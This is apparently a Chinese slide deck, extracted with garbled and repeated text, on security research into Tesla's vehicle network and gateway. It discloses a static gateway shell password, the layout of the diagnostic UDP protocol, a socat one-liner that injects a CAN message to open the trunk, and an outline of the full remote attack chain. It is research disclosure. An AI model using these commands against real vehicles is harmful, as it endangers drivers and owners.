2022特斯拉安全漏洞

特斯拉安全漏洞一、安全研究背景車聯(lián)網(wǎng)安全研究背景智能網(wǎng)聯(lián)汽車將成為汽車行業(yè)的核心重點(diǎn) 大量新技術(shù)和網(wǎng)聯(lián)功能引入，帶來信息安全機(jī)遇“網(wǎng)聯(lián)”汽車：具有互聯(lián)網(wǎng)接入功能的汽車，具備車載系統(tǒng)和車云之間的數(shù)據(jù)同步功能，以及面向用戶的互聯(lián)網(wǎng)訪問服務(wù)功能。大規(guī)模上市期：2017-2020“智能”汽車：具有自動(dòng)駕駛或者無人駕車內(nèi)用戶場(chǎng)景發(fā)生劇烈改變。大規(guī)模上市期：2020-2025行業(yè)領(lǐng)軍品牌

環(huán)境感知層數(shù)據(jù)采集層信息融合層行人障礙物識(shí)別、車輛識(shí)別、場(chǎng)景重構(gòu)、精準(zhǔn)定位等智能決策層路徑規(guī)劃、人機(jī)共駕等控制執(zhí)行層自動(dòng)駕駛、無人駕駛、軌跡跟蹤、轉(zhuǎn)向制動(dòng)、耦合動(dòng)力學(xué)全狀態(tài)參數(shù)識(shí)別等安全體系功能安全（FunctionalSafety)和信息安全（CyberSecurity)已經(jīng)在2016年實(shí)現(xiàn)自動(dòng)駕駛，并計(jì)劃在2020年實(shí)現(xiàn)量產(chǎn)全無人駕駛車。

特斯拉：“網(wǎng)聯(lián)”汽車領(lǐng)域的行業(yè)標(biāo)桿，并已經(jīng)在2016年在量產(chǎn)車上實(shí)現(xiàn)輔助駕駛功能。

智能控制系統(tǒng)架構(gòu)通訊架構(gòu)和控制架構(gòu)整車集成與標(biāo)定整車硬件集成（底盤、車身、電機(jī)、電池系統(tǒng)等）和智能控制系統(tǒng)集成測(cè)試模塊性能測(cè)試（測(cè)試機(jī)理）和整車功能測(cè)試（測(cè)試方法）摘自：上海市政府汽車行業(yè)規(guī)劃發(fā)展內(nèi)部報(bào)告車聯(lián)網(wǎng)安全市場(chǎng)前景“Whilethosetypesofvehiclesareonlybecomingmoreprominent—ReuterssharesdatafrommarketresearcherIDATEshowingthatthenumberofconnectedcarsontheroadhasrisen57percentannuallysince2013andthatthetotalnumberisexpectedtoreach420millionby2018—keepingthemsafefromhackersisbecomingabigbusiness.”“Weviewthisasapotential$10billionmarketopportunityoverthenextfiveyears,”ReutersquotesDanielIves,ananalystwithFBRCapitalMarketsinNewYork,asstating.”“TheReutersstoryaddsthatHarmanInternationalIndustries,amakerofconnectedcarsystems,boughtIsraeli-foundedcyberdefensestartupforthepurposeofprotectingitsandthatglobaltechcompanies,likeIBMandCISCO,alsoemployingtheirteamsinIsraeltoworkonthesecurityofconnectedcars.”-2016/1/12國(guó)際和國(guó)內(nèi)安全行業(yè)：網(wǎng)聯(lián)汽車安全研究成為新熱點(diǎn)2015年7月，黑客可以通過遠(yuǎn)程方式入侵克萊斯勒自由光JEEP并對(duì)行車和車身進(jìn)行遠(yuǎn)程控制，其中涉及了多個(gè)TSP模塊、互聯(lián)網(wǎng)通訊模塊、車機(jī)模塊中多個(gè)安全漏洞。影響：克萊斯勒召回北美地區(qū)140萬輛自由光2015年7月，黑客實(shí)現(xiàn)對(duì)美國(guó)通用OnStar移動(dòng)APP的劫持，可以遠(yuǎn)程控制車門開關(guān)、發(fā)動(dòng)機(jī)啟動(dòng)和鳴號(hào)。主要涉及移動(dòng)APP模塊和TSP模塊的安全漏洞。影響：通用緊急修復(fù)相關(guān)漏洞2016年2月，黑客實(shí)現(xiàn)對(duì)尼桑EVLEAF移動(dòng)APP的劫持，可以遠(yuǎn)程控模塊和TSP影響：尼桑臨時(shí)關(guān)閉LEAF云端服務(wù)二、汽車安全基礎(chǔ)與工具汽車安全研究基礎(chǔ)《CarHackersHandbook》/handbook/《ExposingtheandRisksofHigh》Behind-the-Wheel_Car-Hacking2.pdf《ASurveyofRemoteAutomotiveAttackSurfaces》/remote%20attack%20surfaces.pdf《AdventuresinAutomotiveNetworksandControlUnits》e_Networks_and_Control_Units.pdf汽車安全測(cè)試工具NmapCANalyzerBinwalkIDA汽車安全測(cè)試工具NmapCANalyzerBinwalkIDA汽車安全測(cè)試工具NmapCANalystBinwalkIDA汽車安全測(cè)試工具NmapCANalyzerBinwalkIDA汽車安全測(cè)試工具NmapCANalyzerBinwalkIDA三、特斯拉系統(tǒng)架構(gòu)特斯拉系統(tǒng)概覽ICInstrumentCluster3Linux01CIDCenterInformationDisplay4Linux00GatewayGateway02特斯拉系統(tǒng)架構(gòu)OTAUpdateService(VPN)OtherServicesMediaPlayerWebkitBrowserABS ESP ...OTAUpdateService(VPN)OtherServicesMediaPlayerWebkitBrowserARMv7ARMv7(RTOS)GatewayEthernetRadioWiFi(Linux)(RTOS)GatewayEthernetRadioWiFi(Linux)CellularCellular

UbuntuOSCANUbuntuOS

CHCANBusBodyCANBusDDM PDM C

...In-VehicleNetworkBDYPTOBDIIBDYPTOBDIIETHChannelIC00shelltaskdiagtaskcanethtaskethtasktasksetc.CID01SwitchDIAG02TCP/IPStackCANDriverFreescaleMPC5668GCANChannelsCANChannelsBDYTrunkDoorSunroof…PTVehicleSpeedEngineSpeed…BFTCHASSISOBDII四、特斯拉網(wǎng)關(guān)安全研究汽車網(wǎng)關(guān)車載多路CAN總線之間進(jìn)行數(shù)據(jù)轉(zhuǎn)發(fā)。關(guān)還負(fù)責(zé)以太網(wǎng)與CAN總線之間的數(shù)據(jù)過濾與轉(zhuǎn)發(fā)。典型案例吉普自由光(NECV850)特斯拉(FreescaleMPC5668G)本土車企(NEC78K0R)BDYPTOBDIIBDYPTOBDIIETHChannelIC00shelltaskdiagtaskcanethtaskethtasktasksetc.CID01SwitchDIAG02TCP/IPStackCANDriverFreescaleMPC5668GCANChannelsCANChannelsBDYTrunkDoorSunroof…PTVehicleSpeedEngineSpeed…BFTCHASSISOBDII硬件特性5xxx-32-bit-mcus/mpc56xx-mcus/ultra-reliable-mpc5668g-mcu-for-automotive-industrial-gateway-applications:MPC5668G硬件與固件特性硬件與固件特性系統(tǒng)內(nèi)存布局AddressRegionNameTeslaSpecificsStartEnd0x000000000x00020000FLASHBootloaderandInternalFiles0x000200000x001FFFFFFLASH2CODERegionDATARegion0x400000000x400FFFFFSRAMUpdaterSystemwheninProgrammingMode寄存器內(nèi)存布局/files/32bit/doc/ref_manual/MPC5668xRM.pdf,AppendixA-MemoryMap,Page1242FreeRTOS“TmrSvc”是定位FreeRTOS的關(guān)鍵.FreeRTOS概覽 供任務(wù)管理調(diào)度模塊。Queues隊(duì)列是息機(jī)制以及任務(wù)與中斷的消息傳遞。etc./RTOS.htmlFreeRTOS概覽portBASE_TYPExTaskCreate(pdTASK_CODEpvTaskCode,constchar*constpcName,unsignedshortusStackDepth,void*pvParameters,unsignedportBASE_TYPEuxPriority,xTaskHandle*pvCreatedTask);pvTaskCodePointertothetaskentryfunction.pcNameAdescriptivenameforthetask.usStackDepthThesizeofthetaskstackspecifiedasthenumberofvariablesthestackcanhold-notthenumberofbytes.pvParametersPointerthatwillbeusedastheparameterforthetaskbeingcreated.uxPriorityThepriorityatwhichthetaskshouldrun.pvCreatedTaskUsedtopassbackahandlebywhichthecreatedtaskcanbereferenced.FreeRTOS概覽遞，還可用于實(shí)現(xiàn)信號(hào)量和互斥量等信號(hào)傳遞。特斯拉網(wǎng)關(guān)的FreeRTOSQ TU AE SU KE網(wǎng)絡(luò)協(xié)議棧與文件系統(tǒng)可以成功識(shí)別各接口函數(shù)socketlistensendrecvsendtorecvfrometc.fopenfreadfwritefcloseetc.具體對(duì)應(yīng)的項(xiàng)目有待確認(rèn)TCP/IPstack/projects/lwip/Filesystem/fsw/ff/00index_e.html逆向工程字符串對(duì)齊逆向工程函數(shù)體識(shí)別逆向工程函數(shù)表識(shí)別逆向工程#!/usr/bin/envpythonimportidautilsdefflash_ram_memcpy(frmea,toea,count,itemsize):datalist=idautils.GetDataList(frmea,count,itemsize)idautils.PutDataList(toea,datalist,itemsize)flash_ram_memcpy(0x10C004,0x4004B4F0,(0x40065064-0x4004B4F0)/4,4)特斯拉網(wǎng)關(guān)開放端口TCP231050UDP35002100038001Shelltcp:02:23由創(chuàng)建開啟shellShelltcp:02:23Shell密碼靜態(tài)密碼：1q3e5t7uShelltcp:02:23成功登錄Shelltcp:02:23系統(tǒng)命令控制命令狀態(tài)命令exitresetsdflushinfomkdirformatsddbgrailscphubdbgrtccatexmiireadmvicdbgtimersrmclearlogsdbgsleepdatetegraresethwidlstegrauptimehelprebootstatuschkdskdbglogShelltcp:02:23tegra命令診斷端口udp:02:3500由創(chuàng)建CID發(fā)送：1字節(jié)命令I(lǐng)D,0~28字節(jié)參數(shù)Gateway返回：1字節(jié)命令I(lǐng)D,及N字節(jié)結(jié)果診斷端口udp:02:3500功能列表:0x8REBOOT_FOR_UPDATE更新gatewayCID發(fā)送：00000000 086e6f626f6f742e696d67 0000000b0x04INJECT_CAN0x04INJECT_CAN:如何開后備箱？structDiag_CAN_Msg{CHARdiag_id; //INJECT_CAN==0x04CHARchannel; //CANChannelID,{0-6}WORDcan_id;//CANMsgIDDWORDmsg1;//MessagesDWORDmsg2;};#!/bin/shprintf"\x04\x01\x02\x48\x04\x00\x00\x04\x00\xFF\xFF\x00"|socat-udp:gw:3500演示五、安全研究總結(jié)特斯拉攻擊鏈披露CIDECUs

1.Getcontrolof3G/WiFi8.ControlECUstoperformsomedangerousphysicalactions

2.ExploitWebkitBrowserAndexecutecommandonSystem7.SendmaliciousCANmessagestoCANBus

3.RoottheUbuntusystemReflashmodifiedGatewayfirmware

PatchandDisableAppArmorBypassECU'sfirmwareintegrityverificationTeslavsJeepCellular/Wifi3G:通過釣魚網(wǎng)頁等的配合發(fā)起攻擊。Cellular/WifiWi-Fi:配合瀏覽器特性可以達(dá)到無交互入侵。

汽車網(wǎng)絡(luò)未做隔離，導(dǎo)致通過運(yùn)營(yíng)商網(wǎng)絡(luò)可以接觸汽車。CellularBrowserCellularLinuxKernelGatewayCAN

出色的調(diào)試技巧外加多個(gè)漏洞配合，達(dá)到瀏覽器任意代碼執(zhí)行。ROOT團(tuán)隊(duì)技術(shù)積累帶來的成功內(nèi)核提權(quán)漏洞。多個(gè)環(huán)節(jié)的完整性校驗(yàn)繞過，最終實(shí)現(xiàn)刷入自定義固件。實(shí)現(xiàn)任意CAN總線發(fā)任意CAN消息。最終攻擊效果達(dá)成。

繞過完整性校驗(yàn)實(shí)現(xiàn)刷入自定義固件。實(shí)現(xiàn)任意CAN總線發(fā)任意CAN消息。最終攻擊效果達(dá)成。

D-BusServiceQNXGatewayCAN特斯拉：多個(gè)漏洞的復(fù)雜攻擊鏈。

JEEP：漏洞+運(yùn)營(yíng)商策略配合。特斯拉安全研究總結(jié)汽車移動(dòng)APP汽車移動(dòng)APP安全TSP云服務(wù)安全（Web、數(shù)據(jù)庫(kù)）云、移動(dòng)、車互聯(lián)通信安全無線和近場(chǎng)通信安全車載嵌入式系統(tǒng)應(yīng)用安全車載嵌入式操作系統(tǒng)安全車載嵌入式芯片安全車電網(wǎng)絡(luò)安全難度遠(yuǎn)遠(yuǎn)大于單一模塊攻防，汽車安全任重而道遠(yuǎn)。代碼安全分析:NativecodereviewWebcode代碼安全分析:NativecodereviewWebcodereview協(xié)同實(shí)施安全開發(fā)最佳實(shí)踐:SecureCodingBestPracticesSecurityRequirements/StandardstoTie-1Providers安全能